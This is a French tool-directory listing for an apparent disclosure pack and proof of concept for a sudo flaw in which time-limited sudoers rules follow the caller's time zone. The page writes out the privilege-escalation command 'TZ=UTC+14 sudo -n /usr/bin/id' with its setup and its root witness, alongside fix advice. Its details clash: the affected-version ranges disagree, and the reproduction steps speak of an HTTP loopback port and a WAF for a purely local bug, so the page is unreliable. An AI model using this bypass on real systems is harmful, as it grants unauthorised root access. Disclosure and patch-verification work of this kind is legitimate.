Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-96512 — Pack de divulgation et PoC pour CVE-2026-96512, un contournement de la fenêtre temporelle TZ NOTBEFORE/NOTAFTER de sudo permettant une élévation de privilèges locale, avec reproduction en laboratoire et conseils de correctif. | Kitploit
Outils/GitHubGitHub/abraxas/cve-2026-96512
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationVirtualisation de SécuritéTests d'IntrusionLabs et Pratique
GitHubabraxas/cve-2026-96512

CVE-2026-96512

Pack de divulgation et PoC pour CVE-2026-96512, un contournement de la fenêtre temporelle TZ NOTBEFORE/NOTAFTER de sudo permettant une élévation de privilèges locale, avec reproduction en laboratoire et conseils de correctif.

Voir le dépôt
12il y a 18h 1mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Abraxas Labs — CVE-2026-96512

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-96512

CVE-2026-96512

sudo 1.9.13p3 (Debian bookworm) — Sudo Project

Une faille a été découverte dans sudo. Lorsque les règles sudoers utilisent des restrictions d'accès temporelles NOTBEFORE ou NOTAFTER avec des horodatages qui omettent l'indicateur de fuseau horaire Z final, l'évaluation temporelle repose sur la variable d'environnement TZ héritée de l'utilisateur appelant.

CVECVE-2026-96512 · CVE.org
CWECWE-863
CVSSÉlevé : 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Produitsudo
Affectétoutes les versions jusqu'à 1.9.13p3 (Debian bookworm) (inclus)
Corrigécommit principal 1820a34 (aucune version amont pour l'instant) et ultérieurs
Authauthentifié (voir la carte source)
LicenceGNU Affero GPL v3.0
Lab127.0.0.1 uniquement · pack de divulgation fournisseur/client, pas un scanner

Avis (issu de la carte source)

plugins/sudoers parse_gentime / gram.y timespec. Le correctif sudo-project/sudo@1820a34 copie environ depuis envp et unsetenv TZ.


Entrée

  • Méthode : LOCAL
  • Chemin : TZ=UTC+14 sudo -n /usr/bin/id
  • Routeur : Politique sudoers locale authentifiée. parse_gentime() mktime() sur NOTAFTER sans Z. TZ héritée du sujet sudoers.
  • Notes : CVE-2026-96512 CWE-863 sudo 1.9.13p3. Témoin : uid=0(root) avec TZ=UTC+14 ; refusé sans TZ. Pas un reverse shell. Local PR:L uniquement.

Chaîne d'appel

  • sudoers: labuser ALL=(root) NOPASSWD: NOTAFTER=<now-1h no Z> /usr/bin/id
  • labuser sudo -n /usr/bin/id -> denied (expired)
  • TZ=UTC+14 sudo -n /usr/bin/id
  • parse_gentime mktime honors POSIX TZ=UTC+14
  • NOTAFTER epoch shifts +14h; command allowed as root

Préconditions du lab

  • sudo 1.8.20 jusqu'à 1.9.17p2
  • une règle sudoers pour l'attaquant avec NOTBEFORE ou NOTAFTER et sans Z final

Témoin

Sans TZ : sudo -n id refusé. Avec TZ=UTC+14 : uid=0(root).

Pas un succès

  • root sans TZ (règle toujours valide)
  • accès réseau distant
  • reverse shell

Correctif / remédiation

À faire en premier : Mettez à jour sudo vers le commit principal 1820a34 (aucune version amont pour l'instant) ou plus récent.

Vérifier après la mise à niveau

  • Relancez CVE-2026-96512-Abraxas-Labs.py contre la version corrigée : le témoin mappé ne doit pas apparaître.
  • Confirmez l'avis fournisseur / le changeset dans l'arborescence déployée (voir références).
  • Une signature WAF est un délai, pas un correctif.

Si vous ne pouvez pas mettre à jour immédiatement

  • Désactivez ou isolez le composant affecté.
  • Traquez la condition témoin en production (nouveaux utilisateurs privilégiés, fichiers inattendus, lignes injectées — tout ce que la carte de cette CVE nomme).

Reproduction (lab autorisé)

Ciblez uniquement http://127.0.0.1:8088 (ou le loopback que vous avez lié). Ne pointez pas ce script vers Internet.

root@kitploit:~
python3 CVE-2026-96512-Abraxas-Labs.py

Le succès correspond au témoin ci-dessus dans le corps de la réponse. Un HTML 200 générique n'est pas cela.


Images du lab

Pile loopback utilisée pour reproduire. Images officielles sauf si un Dockerfile dans ce dossier compile depuis les sources.

  • lab/docker-compose.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

Liez l'arborescence du produit vulnérable à côté de Compose si le YAML monte un répertoire local (zip du plugin / tag source issu du tableau des versions). Ne publiez rien d'autre que 127.0.0.1.


Références

  • CVE-2026-96512 · NVD

  • CVE-2026-96512 · CVE.org

  • access.redhat.com/security/cve/cve-2026-96512

  • http://www.openwall.com/lists/oss-security/2026/09/24/4

  • github.com/sudo-project/sudo/commit/1820a349687522f51023d1ae5925125f59679a8c

  • www.cve.org/CVERecord?id=CVE-2026-96512

  • access.redhat.com/security/cve/CVE-2026-96512

  • Abraxas Labs : abraxaslabs.tech · github.com/abraxas · @abraxas_null


Enregistrements (structurés)

root@kitploit:~
# CVE-2026-96512

CWE: CWE-863
CVSS: High 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Red Hat).

## Description

sudoers `NOTBEFORE`/`NOTAFTER` timestamps without a trailing `Z` are converted with `mktime()`, which follows the caller’s `TZ`. A local user who is already named in such a rule can shift the window by up to ~25 hours (POSIX `TZ=UTC+14`) and run the allowed command outside the intended period. PAM authentication is unchanged.

## Product

sudo 1.9.13p3 on Debian bookworm (upstream 1.8.20–1.9.17p2). Fix in main `1820a34`; no upstream tarball yet at disclosure. Lab oracle is `uid=0(root)` via TZ, not a shell.

Licence

Ce pack de divulgation est sous licence GNU Affero General Public License v3.0. Voir LICENSE.


Avertissement

Ce pack est destiné au fournisseur, au propriétaire du site et aux labs autorisés. Le script communique avec 127.0.0.1. L'utiliser contre des systèmes que vous ne possédez pas n'est pas autorisé par Abraxas Labs. Aucune garantie.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

Télécharger l’outil